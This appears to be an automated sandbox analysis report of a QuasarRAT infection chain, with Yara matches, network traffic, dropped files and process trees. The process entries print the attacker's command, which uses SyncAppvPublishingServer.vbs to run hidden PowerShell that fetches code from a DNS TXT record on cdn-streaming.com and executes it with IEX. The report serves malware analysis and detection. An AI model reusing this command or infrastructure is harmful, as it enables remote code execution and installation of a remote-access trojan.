Source: powershell.exe, 00000001.00000002.1898768989.000001AD58B61000.00000004.00000800.00020000.00000000.sdmp, winver.exe, 0000000B.00000002.2942161728.000001F980001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1898768989.000001AD58D87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000001.00000002.1898768989.000001AD59C8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1898768989.000001AD59CA1000.00000004.00000800.00020000.00000000.sdmp, winver.exe.1.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: powershell.exe, 00000001.00000002.1898768989.000001AD59C8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1898768989.000001AD59CA1000.00000004.00000800.00020000.00000000.sdmp, winver.exe.1.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: winver.exe	String found in binary or memory: http://www.autoitscript.com/autoit3/
Source: winver.exe, 0000000B.00000000.1888510146.00007FF63D885000.00000002.00000001.01000000.00000009.sdmp, winver.exe.1.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: 2D85F72862B55C4EADD9E66E06947F3D0.5.dr	String found in binary or memory: http://x1.i.lencr.org/
Source: powershell.exe, 00000001.00000002.1898768989.000001AD58B61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000001.00000002.1898768989.000001AD59059000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1935692872.000001AD70CD5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: winver.exe, 0000000B.00000002.2943385334.000001F990009000.00000004.00000800.00020000.00000000.sdmp, winver.exe, 0000000B.00000002.2941064855.00000000002B0000.00000020.00000001.00020000.00000000.sdmp, winver.exe, 0000000B.00000002.2950072925.000001F9F3BE0000.00000004.08000000.00040000.00000000.sdmp, winver.exe, 0000000B.00000002.2949364454.000001F9F38BA000.00000004.00000001.00020000.00000000.sdmp, winver.exe, 0000000B.00000002.2948303433.000001F9F2ED1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: powershell.exe, 00000001.00000002.1898768989.000001AD5A0D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1898768989.000001AD59059000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1898768989.000001AD59ADB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1898768989.000001AD59CA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1898768989.000001AD593F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn-streaming.com
Source: powershell.exe, 00000001.00000002.1898768989.000001AD5A1A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1898768989.000001AD5A1A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn-streaming.com/62rgx9T9MW.pdf
Source: powershell.exe, 00000001.00000002.1898768989.000001AD5A1A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1898768989.000001AD5A1A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn-streaming.com/avatar.jpg
Source: powershell.exe, 00000001.00000002.1898768989.000001AD59059000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn-streaming.com/hP3TJdoqvDIYbA3JIxDstAFA
Source: powershell.exe, 00000001.00000002.1898768989.000001AD5A0D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn-streaming.com/hP3TJdoqvDIYbA3JIxDstAFAX
Source: powershell.exe, 00000001.00000002.1898768989.000001AD5A1A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1898768989.000001AD5A1A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn-streaming.com/logo.png
Source: svchost.exe, 00000006.00000003.1823538213.00000167A7CC2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.dr	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.6.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.6.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.6.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000006.00000003.1823538213.00000167A7CC2000.00000004.00000800.00020000.00000000.sdmp, edb.log.6.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: winver.exe, 0000000B.00000002.2942161728.000001F98016B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ipwho.is
Source: winver.exe, 0000000B.00000002.2943385334.000001F990009000.00000004.00000800.00020000.00000000.sdmp, winver.exe, 0000000B.00000002.2941064855.00000000002B0000.00000020.00000001.00020000.00000000.sdmp, winver.exe, 0000000B.00000002.2950072925.000001F9F3BE0000.00000004.08000000.00040000.00000000.sdmp, winver.exe, 0000000B.00000002.2949364454.000001F9F38BA000.00000004.00000001.00020000.00000000.sdmp, winver.exe, 0000000B.00000002.2942161728.000001F98016B000.00000004.00000800.00020000.00000000.sdmp, winver.exe, 0000000B.00000002.2948303433.000001F9F2ED1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://ipwho.is/
Source: svchost.exe, 00000006.00000003.1823538213.00000167A7CC2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.6.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: winver.exe, 0000000B.00000002.2943385334.000001F990009000.00000004.00000800.00020000.00000000.sdmp, winver.exe, 0000000B.00000002.2950072925.000001F9F3BE0000.00000004.08000000.00040000.00000000.sdmp, winver.exe, 0000000B.00000002.2949364454.000001F9F38BA000.00000004.00000001.00020000.00000000.sdmp, winver.exe, 0000000B.00000002.2941120717.00000000002C0000.00000020.00000001.00020000.00000000.sdmp, winver.exe, 0000000B.00000002.2948303433.000001F9F2ED1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: winver.exe, 0000000B.00000002.2943385334.000001F990009000.00000004.00000800.00020000.00000000.sdmp, winver.exe, 0000000B.00000002.2950072925.000001F9F3BE0000.00000004.08000000.00040000.00000000.sdmp, winver.exe, 0000000B.00000002.2949364454.000001F9F38BA000.00000004.00000001.00020000.00000000.sdmp, winver.exe, 0000000B.00000002.2941120717.00000000002C0000.00000020.00000001.00020000.00000000.sdmp, winver.exe, 0000000B.00000002.2942161728.000001F980046000.00000004.00000800.00020000.00000000.sdmp, winver.exe, 0000000B.00000002.2948303433.000001F9F2ED1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: winver.exe, 0000000B.00000002.2943385334.000001F990009000.00000004.00000800.00020000.00000000.sdmp, winver.exe, 0000000B.00000002.2941064855.00000000002B0000.00000020.00000001.00020000.00000000.sdmp, winver.exe, 0000000B.00000002.2950072925.000001F9F3BE0000.00000004.08000000.00040000.00000000.sdmp, winver.exe, 0000000B.00000002.2949364454.000001F9F38BA000.00000004.00000001.00020000.00000000.sdmp, winver.exe, 0000000B.00000002.2948303433.000001F9F2ED1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: powershell.exe, 00000001.00000002.1898768989.000001AD59C8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1898768989.000001AD59CA1000.00000004.00000800.00020000.00000000.sdmp, winver.exe.1.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: powershell.exe, 00000001.00000002.1898768989.000001AD59C8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1898768989.000001AD59CA1000.00000004.00000800.00020000.00000000.sdmp, winver.exe.1.dr	String found in binary or memory: https://www.globalsign.com/repository/0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735

Source: unknown	HTTPS traffic detected: 37.1.223.28:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.181.61.49:443 -> 192.168.2.4:49829 version: TLS 1.2

Source: C:\Windows\Tasks\winver.exe

Code function: 11_2_00007FF63D791990 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,

11_2_00007FF63D791990

E-Banking Fraud

Yara detected Quasar RAT

Source: Yara match	File source: 11.2.winver.exe.1f9f3be0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.winver.exe.1f9f3be0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.winver.exe.1f9900100e8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.winver.exe.1f9900100e8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.winver.exe.10957.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.winver.exe.1f9f2ed1997.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.winver.exe.1f9f2ed1997.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2940913887.0000000000280000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2941396332.0000000000320000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2941064855.00000000002B0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2941354870.0000000000310000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2942161728.000001F980001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2943385334.000001F990009000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2942161728.000001F9801D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2949364454.000001F9F38BA000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2950072925.000001F9F3BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2948303433.000001F9F2ED1000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: winver.exe PID: 7284, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 11.2.winver.exe.1f9f3be0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 11.2.winver.exe.1f9f3be0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 11.2.winver.exe.1f9f3be0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar infostealer Author: ditekshen
Source: 11.2.winver.exe.1f9f3be0000.3.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 11.2.winver.exe.1f9f3be0000.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 11.2.winver.exe.1f9f3be0000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar infostealer Author: ditekshen
Source: 11.2.winver.exe.1f9900100e8.1.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 11.2.winver.exe.1f9900100e8.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 11.2.winver.exe.1f9900100e8.1.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar infostealer Author: ditekshen
Source: 11.2.winver.exe.1f9900100e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 11.2.winver.exe.1f9900100e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 11.2.winver.exe.1f9900100e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar infostealer Author: ditekshen
Source: 11.2.winver.exe.10957.0.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 11.2.winver.exe.10957.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 11.2.winver.exe.10957.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar infostealer Author: ditekshen
Source: 11.2.winver.exe.1f9f2ed1997.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 11.2.winver.exe.1f9f2ed1997.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 11.2.winver.exe.1f9f2ed1997.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar infostealer Author: ditekshen
Source: 11.2.winver.exe.1f9f2ed1997.2.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 11.2.winver.exe.1f9f2ed1997.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 11.2.winver.exe.1f9f2ed1997.2.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar infostealer Author: ditekshen
Source: 0000000B.00000002.2950072925.000001F9F3BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 0000000B.00000002.2950072925.000001F9F3BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0000000B.00000002.2950072925.000001F9F3BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Quasar infostealer Author: ditekshen

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Windows\Tasks\winver.exe

Jump to dropped file

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n;(Resolve-DnsName -Name ebtxghggfv.cdn-streaming.com -Type TXT).Strings \| IEX}
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n;(Resolve-DnsName -Name ebtxghggfv.cdn-streaming.com -Type TXT).Strings \| IEX}			Jump to behavior

Source: C:\Windows\Tasks\winver.exe	Code function: 11_2_000001F9F2BB0787 NtWriteVirtualMemory,NtProtectVirtualMemory,NtAllocateVirtualMemory,	11_2_000001F9F2BB0787
Source: C:\Windows\Tasks\winver.exe	Code function: 11_2_000001F9F2BB0970 NtProtectVirtualMemory,	11_2_000001F9F2BB0970
Source: C:\Windows\Tasks\winver.exe	Code function: 11_2_000001F9F2BB0AD0 NtOpenSection,NtMapViewOfSection,NtProtectVirtualMemory,NtProtectVirtualMemory,NtUnmapViewOfSection,NtClose,	11_2_000001F9F2BB0AD0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\Tasks\62rgx9T9MW.pdf	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\Tasks\cd394167-be4e-4779-8fcd-6d3374e9bfcc	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\Tasks\winver.exe	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp	Jump to behavior

Source: C:\Windows\Tasks\winver.exe	Code function: 11_2_00007FF63D7A2E40	11_2_00007FF63D7A2E40
Source: C:\Windows\Tasks\winver.exe	Code function: 11_2_00007FF63D7BC730	11_2_00007FF63D7BC730
Source: C:\Windows\Tasks\winver.exe	Code function: 11_2_00007FF63D829658	11_2_00007FF63D829658
Source: C:\Windows\Tasks\winver.exe	Code function: 11_2_00007FF63D7CAEA0	11_2_00007FF63D7CAEA0
Source: C:\Windows\Tasks\winver.exe	Code function: 11_2_00007FF63D7BC9FC	11_2_00007FF63D7BC9FC
Source: C:\Windows\Tasks\winver.exe	Code function: 11_2_00007FF63D83CE20	11_2_00007FF63D83CE20
Source: C:\Windows\Tasks\winver.exe	Code function: 11_2_00007FF63D7C1D50	11_2_00007FF63D7C1D50
Source: C:\Windows\Tasks\winver.exe	Code function: 11_2_00007FF63D7D589C	11_2_00007FF63D7D589C
Source: C:\Windows\Tasks\winver.exe	Code function: 11_2_00007FF63D842BD4	11_2_00007FF63D842BD4
Source: C:\Windows\Tasks\winver.exe	Code function: 11_2_00007FF63D7D73E4	11_2_00007FF63D7D73E4
Source: C:\Windows\Tasks\winver.exe	Code function: 11_2_00007FF63D794358	11_2_00007FF63D794358
Source: C:\Windows\Tasks\winver.exe	Code function: 11_2_00007FF63D792780	11_2_00007FF63D792780
Source: C:\Windows\Tasks\winver.exe	Code function: 11_2_00007FF63D7B4BB4	11_2_00007FF63D7B4BB4

Source: Joe Sandbox View

Dropped File: C:\Windows\Tasks\winver.exe 92C6531A09180FAE8B2AAE7384B4CEA9986762F0C271B35DA09B4D0E733F9F45

Source: 11.2.winver.exe.1f9f3be0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 11.2.winver.exe.1f9f3be0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 11.2.winver.exe.1f9f3be0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: 11.2.winver.exe.1f9f3be0000.3.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 11.2.winver.exe.1f9f3be0000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 11.2.winver.exe.1f9f3be0000.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: 11.2.winver.exe.1f9900100e8.1.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 11.2.winver.exe.1f9900100e8.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 11.2.winver.exe.1f9900100e8.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: 11.2.winver.exe.1f9900100e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 11.2.winver.exe.1f9900100e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 11.2.winver.exe.1f9900100e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: 11.2.winver.exe.10957.0.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 11.2.winver.exe.10957.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 11.2.winver.exe.10957.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: 11.2.winver.exe.1f9f2ed1997.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 11.2.winver.exe.1f9f2ed1997.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 11.2.winver.exe.1f9f2ed1997.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: 11.2.winver.exe.1f9f2ed1997.2.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 11.2.winver.exe.1f9f2ed1997.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 11.2.winver.exe.1f9f2ed1997.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: 0000000B.00000002.2950072925.000001F9F3BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 0000000B.00000002.2950072925.000001F9F3BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0000000B.00000002.2950072925.000001F9F3BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer

Source: classification engine

Classification label: mal100.troj.expl.evad.winLNK@25/66@7/3

Source: C:\Windows\Tasks\winver.exe

Code function: 11_2_00007FF63D814940 GetLastError,FormatMessageW,

11_2_00007FF63D814940

Source: C:\Windows\Tasks\winver.exe

Code function: 11_2_00007FF63D80CC88 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

11_2_00007FF63D80CC88

Source: C:\Windows\Tasks\winver.exe

Code function: 11_2_00007FF63D813EA8 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

11_2_00007FF63D813EA8

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\Tasks\winver.exe	Mutant created: NULL
Source: C:\Windows\Tasks\winver.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\65768f90-1bce-4e20-baef-7e1bf22954c2
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7360:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fpckmecv.1sa.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" C:\Windows\System32\SyncAppvPublishingServer.vbs "n;(Resolve-DnsName -Name ebtxghggfv.cdn-streaming.com -Type TXT).Strings | IEX"

Source: C:\Windows\Tasks\winver.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" C:\Windows\System32\SyncAppvPublishingServer.vbs "n;(Resolve-DnsName -Name ebtxghggfv.cdn-streaming.com -Type TXT).Strings \| IEX"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n;(Resolve-DnsName -Name ebtxghggfv.cdn-streaming.com -Type TXT).Strings \| IEX}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c start "" "C:\Windows\Tasks\62rgx9T9MW.pdf"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Windows\Tasks\62rgx9T9MW.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
